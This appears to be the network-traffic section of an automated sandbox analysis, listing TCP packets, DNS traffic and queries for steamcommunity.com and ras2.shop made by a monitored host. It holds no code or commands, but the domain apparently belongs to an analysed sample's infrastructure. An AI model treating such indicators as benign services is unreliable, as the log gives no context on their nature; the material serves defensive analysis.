                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720330954 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720354080 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720396042 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720451117 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720451117 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720451117 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720487118 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720499992 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.720546007 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.725590944 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.725651026 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.733839035 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.733891964 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.733911991 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.733968973 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.740377903 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.740442991 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.839786053 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.839834929 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.839859962 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.839972973 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.843889952 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.843941927 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.911966085 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.912026882 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.915802956 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.915868998 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.916094065 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.916156054 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.923577070 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.923628092 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.923652887 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.923712015 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.931581020 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.931655884 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.931674957 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.931718111 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.939413071 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.939475060 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.946963072 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.947119951 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.947132111 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.947179079 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.954708099 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.954761982 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.954772949 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.954797029 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.954814911 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.954838991 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.955677032 CET49734443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.955704927 CET44349734104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.994261980 CET49736443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.994313955 CET44349736104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.994388103 CET49736443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.994601965 CET49736443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:38.994620085 CET44349736104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.206626892 CET44349736104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.206693888 CET49736443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.210587025 CET49736443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.210616112 CET44349736104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.210809946 CET49736443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.210815907 CET44349736104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.214159966 CET49736443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.214165926 CET44349736104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.214196920 CET49736443192.168.2.4104.21.2.114
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.214200020 CET44349736104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:40.836730003 CET44349736104.21.2.114192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.646590948 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.660267115 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.660317898 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.660321951 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.686940908 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.687047005 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.687094927 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.687099934 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.687655926 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.691164970 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.697218895 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.697276115 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.697279930 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.743033886 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.768508911 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.772770882 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.772819996 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.772824049 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.779863119 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.779926062 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.779930115 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.788768053 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.788862944 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.788918018 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.788922071 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.788964033 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.801430941 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.813951015 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.814004898 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.814009905 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.825670958 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.825731039 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.825736046 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.837276936 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.837328911 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.837332964 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.838762999 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.838825941 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.838829994 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.849522114 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.849567890 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.849571943 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.859680891 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.859864950 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.859869957 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.869389057 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.869476080 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.869481087 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.877696991 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.877909899 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.877913952 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.886301994 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.886353970 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.886358023 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.894489050 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.894583941 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.894588947 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.902802944 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.902852058 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.902857065 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.910769939 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.910897970 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.910902977 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.918891907 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.918940067 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.918943882 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.926625967 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.926668882 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.926672935 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.935029030 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.935117960 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.935122967 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.941056013 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.941102982 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.941109896 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.948828936 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.948879957 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.948884964 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.956758976 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.956877947 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.956882954 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.962928057 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.963038921 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.963042974 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.969675064 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.969727039 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.969732046 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.975509882 CET44349745172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:47.975552082 CET49745443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918925047 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918955088 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918988943 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918988943 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.918996096 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919030905 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919035912 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919070959 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919075012 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919116020 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919157982 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919197083 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919197083 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919214010 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919245958 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919251919 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919281006 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919296980 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919347048 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919378042 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919384003 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919388056 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919416904 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919420958 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919476032 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919507980 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919538975 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919540882 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919545889 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919574976 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919583082 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.919624090 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920165062 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920228004 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920255899 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920278072 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920281887 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920311928 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920316935 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920320988 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920350075 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920352936 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920382023 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920423985 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920460939 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920461893 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920469046 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920495033 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920520067 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920546055 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920555115 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920558929 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920722961 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.920981884 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921046972 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921076059 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921118021 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921122074 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921161890 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921165943 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921211958 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921401024 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921408892 CET44349758142.250.181.78192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:54.921423912 CET49758443192.168.2.4142.250.181.78
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.336777925 CET44349747172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.336822987 CET44349747172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.336884022 CET49747443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.741130114 CET49747443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.741153955 CET44349747172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:32.964720011 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:33.084757090 CET8049723199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:33.085030079 CET4972380192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:48.840086937 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:48.840116024 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:48.840164900 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:48.840375900 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:48.840395927 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.621141911 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.621422052 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.621448994 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.621783018 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.622128010 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.622191906 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:50.672178030 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:00.306236029 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:00.306276083 CET44349837172.217.21.36192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:00.306324005 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:15.723989964 CET49837443192.168.2.4172.217.21.36
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:15.724020958 CET44349837172.217.21.36192.168.2.4
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.576178074 CET6433553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.576400042 CET5047453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.709765911 CET53535531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.713077068 CET53643351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:51.814459085 CET53504741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.568097115 CET6311353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.568245888 CET6259153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.705461025 CET53631131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:52.706034899 CET53625911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:27:56.879071951 CET53644661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:04.163192987 CET53494901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:23.110851049 CET53574721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:44.302900076 CET53621901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:28:45.462949991 CET53542581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:29:15.863406897 CET53637371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                    Dec 27, 2024 21:30:02.304074049 CET53614091.1.1.1192.168.2.4
Timestamp                            Source IP    Dest IP  Checksum  Code                Type
Dec 27, 2024 21:27:51.814538002 CET  192.168.2.4  1.1.1.1  c22c      (Port unreachable)  Destination Unreachable
Dec 27, 2024 21:29:14.059928894 CET  192.168.2.4  1.1.1.1  c233      (Port unreachable)  Destination Unreachable
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Dec 27, 2024 21:27:34.172112942 CET  192.168.2.4  1.1.1.1  0xcf57    Standard query (0)  steamcommunity.com  A (IP address)  IN (0x0001)  false
Dec 27, 2024 21:27:36.753480911 CET  192.168.2.4  1.1.1.1  0xebe5    Standard query (0)  ras2.shop           A (IP address)  IN (0x0001)  false
